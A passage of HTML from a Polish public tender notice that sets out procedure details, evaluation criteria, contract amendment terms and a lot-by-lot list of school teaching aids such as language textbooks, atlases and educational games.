id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci">Nie</span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin realizacji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">2.	Zamawiający, poza możliwością zmiany zawartej umowy na podstawie art. 144 ust. 1 ustawy Pzp, przewiduje również możliwość dokonywania zmian postanowień zawartej umowy, także w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w następujących okolicznościach:1)	zmiany ustawowej stawki podatku VAT - jej obniżenie lub podwyższenie jest możliwe w wysokości odpowiadającej zmianie podatku,2)	zmiany danych teleadresowych, osób reprezentujących firmę, przedstawionych w umowie - na wniosek zamawiającego lub wykonawcy w postaci pisemnej zgody,3)	zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy,4)	zmianę podwykonawców, dalszych podwykonawców za pisemną zgodą zamawiającego w zakresie określonym w ofercie lub wprowadzeniem nowych. Wraz z niniejsza propozycją wykonawca zobowiązany jest przedstawić umowę/projekt umowy z podwykonawcą, dalszymi podwykonawcami - zapisy ustawy stosuje się.5)	gdy zmiany treści umowy są korzystne dla zamawiającego,6)	zmiany związane z rezygnacją przez zamawiającego z części zamówienia,7)	jeżeli nastąpi zwiększenie zakresu przedmiotu umowy wraz ze wzrostem należnego wykonawcy wynagrodzenia;8)	jeżeli wystąpią okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności;3.	Wszelkie zmiany umowy winny zostać dokonane wyłącznie w formie aneksu do umowy podpisanego przez obie strony, pod rygorem nieważności.4.	Strona występująca o zmianę zawartej umowy: opisze zaistniałe okoliczności, uzasadni, udokumentuje zaistnienie powyższych okoliczności, obliczy koszty zmian, jeśli zmiana będzie miała wpływ na wynagrodzenie wykonawcy, opisze wpływ zmian na termin wykonania umowy, wniosek o zmianę postanowień zawartej umowy musi być wyrażona na piśmie.5.	Na wykonawcy ciąży obowiązek pisemnego powiadamiania o zmianie adresu siedziby wykonawcy. W przypadku nie powiadomienia zamawiającego o zmianie adresu siedziby wykonawcy, pisma doręczone pod dotychczasowy adres uważa się za doręczone prawidłowo.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-01-18</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">15:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Zakup wraz z dostawą pomocy dydaktycznych </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakup wraz z dostawą pomocy dydaktycznych - szczegółowy opis przedmiotu zamówienia wraz z wyspecyfikowaniem rodzaju i ilości asortymentów stanowiących przedmiot zamówienia zawiera załącznik nr 1 ( formularz cenowy) do siwz;<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39162100-6, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 45<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena </td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin realizacji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Zakup wraz z dostawą pomocy dydaktycznych do języków obcych (j. angielski, j. rosyjski, j. niemiecki), podręczniki i poradniki (pozycje książkowe)- </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. "Matematyka z wesołym kangurem"	Autor-praca zbiorowa ,Rok wydania: 2016, Oprawa: miękka ,Liczba stron: 224, Format: 17.6 x 25.0 cm	zestaw	24 2. ,,Und so weiter" Materiały ćwiczeniowe do j. Niemieckiego dla klasy 4	"Und so weiter neu 1. Zeszyt ćwiczeń do języka niemieckiego dla klasy 4 (wersja rozszerzona)" Marta Kozubska , Ewa Krawczyk , Lucyna Zastapiło. Publikacja zawiera zadania utrwalające. Dodatkowe gry ułatwiają przyswajanie słówek, konstrukcji i reguł gramatycznych poprzez zabawę, również podczas pracy indywidualnej.	sztuka	16 3. ,,Und so weiter" Podręcznik do nauki j. Niemieckiego dla klasy 4 Und soweiterneu 1. Marta Kozubska , Ewa Krawczyk , Lucyna Zastapiło. Podręcznik do klasy czwartej zawiera m.in.: 7 rozdziałów tematycznych, scenariusz sztuki teatralnej ,,Ich bin so allein", niemiecko-polski słowniczek alfabetyczny. Oprawa miękka, rok wydania 2017.	sztuka	16 4. Angielski, karty dla dzieci - 100 pierwszych zdań	Karty 100 pierwszych zdań. Zestaw zawiera: książeczkę z grami i podstawami gramatyki, 104 kolorowe karty angielsko-polskie, płytę CD z nagraniami zdań i piosenek. Wymiary kart 6,7 x 10 cm.	sztuka	2 5. Angielskie słowa w kawałkach	Wieloelementowa pomoc do nauki języka angielskiego, wprowadzająca 90 rodzin wyrazów. W zestawie 220 elem., instrukcja	sztuka	2 6. Atlas geograficzny	Szkolny atlas geograficzny łączący ujęcie globalne (na mapach świata) z przeglądem regionalnym (kontynenty i części kontynentów), szczegółowe opracowanie dla Polski. Charakterystyka środowiska naturalnego, zagadnienia społeczne i gospodarcze oparte na najnowszych danych statystycznych i opracowaniach specjalistów. W zestawie płyta CD z mapami konturowymi.	sztuka	30 7. Atlas grzybów	Atlas zawiera szczegółowe opisy i profesjonalne zdjęcia min 250 gatunków grzybów występujących w Polsce. Oprawa: kartonowa w obwolucie PCV, zalecany format: 13 x 19,5 cm.	sztuka	5 8. Atlas minerałów i kamieni szlachetnych i skał Atlas zawiera duże fotografie barwne i opisy min. 200 najważniejszych minerałów, kamieni szlachetnych i skał, ich opisy gęstości, barwy, pokroju, pochodzenia i zastosowania. Zalecany format: 10,8 x 18 cm, oprawa: kartonowa ze skrzydełkami. sztuka	5 9. Atlas owadów	Atlas zawiera opisy min. 1000 gatunków owadów, ponad 1400 zdjęć wykonanych w naturze, opisy trybu życia, najważniejszych cech i zwyczajów owadów. Zalecany format: 13,3 x 19 cm, oprawa kartonowa z obwolutą PCV. Zalecany format wynika z możliwości łatwego korzystania z przewodnika w terenie.	sztuka	5 10. Atlas pogoda i klimat	Atlas zawiera opisy, wyjaśnienia i fotografie min. 300 zjawisk związanych z pogodą i klimatem. Zalecany format: 13 x 19,3 cm, oprawa: kartonowa z obwolutą PCV.	sztuka	5 11. Atlas przyrodniczy	Atlas zawiera infografiki z barwnymi zdjęciami , przejrzyste schematy, część wykonana na kalce, czytelne mapy. Taka forma graficzna ułatwia analizę przedstawionych zagadnień. Atlas zawiera mapy Polski, Europy, świata, człowieka, otaczającej przyrody. Format: A4	sztuka	30 12. Atlas przyrodniczy dla dzieci	autor: Joanna Kuryjak Atlas przyrodniczy dla dzieci Zwierzęta i rośliny Polski, Oprawa miękka, Liczba stron: 112	sztuka	3 13. Atlas ptaków w Polsce	Ilustrowana encyklopedia zawierająca zdjęcia i opisy większości gatunków ptaków występujących w Polsce, zalecany format: 21 x 27,5 cm, oprawa twarda, dołączona płyta CD z głosami ptaków.	sztuka	5 14. Atlas roślin chronionych w Polsce Atlas przedstawia min. 380 gatunków naczyniowych roślin chronionych w Polsce, ich miejsca występowania i kategorie zagrożenia. Rośliny zgrupowane są według barw kwiatów. Oprawa kartonowa z obwolutą PCV, zalecany format: 13 x 19,5 cm.	sztuka	5 15. Atlas ziół	Bogato ilustrowany atlas wprowadza w zagadnienia stosowania ziół oraz produkcji surowców zielarskich z roślin uprawianych w ogrodzie lub dziko rosnących. Wiedzą dzielą się producenci ziół, naukowcy z ośrodków badawczych i doświadczalnych oraz zioło-lekarze z zakonu ojców Bonifratrów. Liczba stron : 144, oprawa i wymiary: twarda, 170 x 240 mm.	sztuka	3 16. Atlas zwierząt chronionych w Polsce	Atlas zwierząt chronionych przedstawia szczegółowo opisy min. 400 wybranych gatunków zwierząt chronionych, ich cechy charakterystyczne, tryb życia, rozród, rozmieszczenie na terenie Polski, zamieszkiwane środowiska, zagrożenia. Atlas zawiera ponad tysiąc ilustracji, rysunków i zdjęć. Zalecany format: 21 x 30 cm, oprawa: twarda.	sztuka	5 17. Basic Facts about Great Britain Fakty o GB	Nazwa: Basic Facts about Great Britain Fakty o GB, Rozmiar: 160 cm x 120 cm plansza dwustronna, laminowana, oprawiona w drewniane wałki z zawieszką w języku angielskim	sztuka	2 18. Budowanie zdań - grupowy zestaw z klockami reading rods	Zestaw zawiera podstawowe pomoce potrzebne do nauki budowania poprawnych zdań oraz tworzenia pojęć gramatycznych. Zawartość zestawu: duży zestaw klocków Reading Rods - Tworzenie zdań 4 zestawy kart aktywności 'Tworzenie zdań' książka "Word Building - Instruction & Activity Book" (48-stron) zawierająca ponad 100 kartoników do demontracji 4 podstawki do kart i klocków Reading Rods całość umieszczona w estetycznym pudełku z przykrywką	sztuka	2 19. Budujemy zdania po angielsku	Pomoc rozwija i ćwiczy umiejętność czytania i wymowy angielskich słów oraz utrwala ich poprawną pisownię. Karty pomagają w zrozumieniu, w jaki sposób i gdzie używać części mowy, wielkich liter oraz interpunkcji w angielskich zdaniach. Zawartość: o 55 słów o 4 interpunkcje o 27 zdjęć o instrukcja o wym. elem. ok. 5 x 5 cm	sztuka	2 20. Czas teraźniejszy ciągły - karty do nauki czasowników	Zestaw Angielski dla początkujących przygotowano z myślą o osobach chcących rozpocząć naukę języka angielskiego od podstaw. Zawarte w nim tytuły dobrano tak, aby umożliwić opanowanie zagadnień leksykalno-gramatycznych niezbędnych do poprawnej komunikacji na poziomie podstawowym (A1, A2). W skład zestawu wchodzą: Starter, Słownictwo 1, Słownictwo 2, Czasowniki dla początkujących	sztuka	16 21. Czasowniki po angielsku-zdjęcia	Zestaw zawiera: 108 fotografii o wym. 7 x 7 cm, 108 podpisów o wym. 7 x 3 cm, instrukcję	sztuka	16 22. Ćwiczymy czytanie ze zrozumieniem	Zestaw zawiera 8 tematycznych teczek: Giraffes can't swim, The Perfect Pet, Howard's Horrible Hiccups, The Case of the Missing Pie, A Better Place to Study, A Sticky Home, Towering Triangles, What's So Great About Mona Lisa?Każda teczka zawiera: kieszeń na przechowywanie planu lekcji i osobna na kopie ćwiczeń, 6 kopii fragmentów do czytania, 12 kart ze słownictwem. Całość jest zebrana w trwałym, lakierowanym kartonowym pudelku. Zawartość: 8 teczek, 48 kart z tekstami, 96 kart ze słownictwem, instrukcja	sztuka	2 23. Diagnoza nauczycielska. Narzędzia pomiaru pedagogicznego. Narzędzia do obserwacji i diagnozy umiejętności czytania i pisania uczniów. Pozycja zawiera próby diagnozujące umiejętność czytania i pisania uczniów szkoły podstawowej, teksty korektorskie służące badaniu spostrzegawczości wzrokowej.	sztuka	1 24. Edukacyjne sówki	Pomoc dydaktyczna, dla której powinna być zapewniona następująca funkcjonalność: Sówki można wykorzystać jako liczmany lub nawlekać je na korale na specjalnie przygotowane wstążki. Jeden komplet wstążek wykonany jest w czterech kolorach, aby sortować sówki według koloru. Drugi komplet wstążek wykonany jest w zielonym kolorze z nadrukiem osi liczbowej od 1 do 10, aby doskonalić liczenie. Każda wstążka zaopatrzona jest w końcówkę, ułatwiającą nawlekanie. Zestaw powinien zawierać: ok. 40 sówek w różnych kolorach wykonane z tworzywa, wymiary ok.: śr. 5 cm, grub. 1,5, śr. otworu 1 cm) - 4 wstążki w różnych kolorach - 4 wstążki zielone z nadrukiem osi liczbowej - dł. wstążki ok. 45 cm, instrukcję.	sztuka	3 25. Gra edukacyjna English Eater - Chatter	Gra składa się z: plansza do gry o wymiarach 32 x 24 cm, zestaw 68 drewnianych klocków o wymiarach 3 x 3 cm, w tym dwa zestawy klocków z różnymi zadaniami (po 28 sztuk) oraz jeden zestaw klocków mających pewną funkcję w grze (12 sztuk), kostka do gry, 6 pionków, instrukcja.	sztuka	2 26. Gra edukacyjna: Poszukaj pasujących kategorii tematycznych	Gra edukacyjna, składająca się z 56 kart, która pomaga uczniom wzbogacać słownictwo i rozwijać umiejętności skojarzeniowe	sztuka	2 27. Gra językowa Bis- Deutsch	Super Bis Deutsch jest grą językową rozwijającą umiejętność zadawania pytań oraz udzielania odpowiedzi w języku niemieckim związanych z prostymi sytuacjami życia codziennego. Zestaw zawiera: 120 ilustrowanych kart (w tym 60 kart pytaniami związanymi z prostymi sytuacjami życia codziennego, oraz 60 kart z odpowiedziami), broszurę metodyczną w języku niemieckim opisującą reguły gry i różne scenariusze prowadzenia rozgrywki oraz zawierającą sugestie dotyczące możliwych sposobów wykorzystania gry w trakcie zajęć, dodatkową kostkę do gry,rozbudowaną instrukcję w języku polskim.	sztuka	2 28. Gra językowa Schnitzeljagd Deutsch	Gra językowa Schnitzeljagd Deutsch z polską instrukcją.Zestaw zawiera: 66 kart ze zdjęciami wybranych miejsc, zabytków, postaci i kulinariów charakterystycznych dla Niemiec i krajów niemieckojęzycznych, 66 kart z opisami odnoszącymi się do obrazków (po 5 wskazówek na każdej karcie), instrukcję w języku niemieckim, dodatkową kostkę do gry, rozbudowaną instrukcję w języku polskim.	sztuka	2 29. Gra językowa Wir packen unseren Koffer Gra językowa Die Rundreise. Zestaw zawiera: składaną papierową planszę do gry zawierającą 100 pól (w tym niektóre opatrzone zdjęciami),132 karty podzielone na 6 talii o następujących określonych kolorach i tematyce, dwie składane papierowe kostki do gry (jedna z kolorami, druga z "oczkami"), 16-stronicową broszurę metodyczną w języku niemieckim z opisem reguł gry, mapką Niemiec, Austrii i Szwajcarii, dodatkowymi pomysłami dotyczącymi różnych wariantów prowadzenia rozgrywki, a także prezentacją w formie krótkich opisów najciekawszych miejsc znajdujących się na terenie wspomnianych krajów wraz z adresami stron internetowych prezentujących interesujące informacje na ich temat, dodatkową kostkę do gry, rozbudowaną instrukcję w języku polskim.	sztuka	2 30. Gramatyka 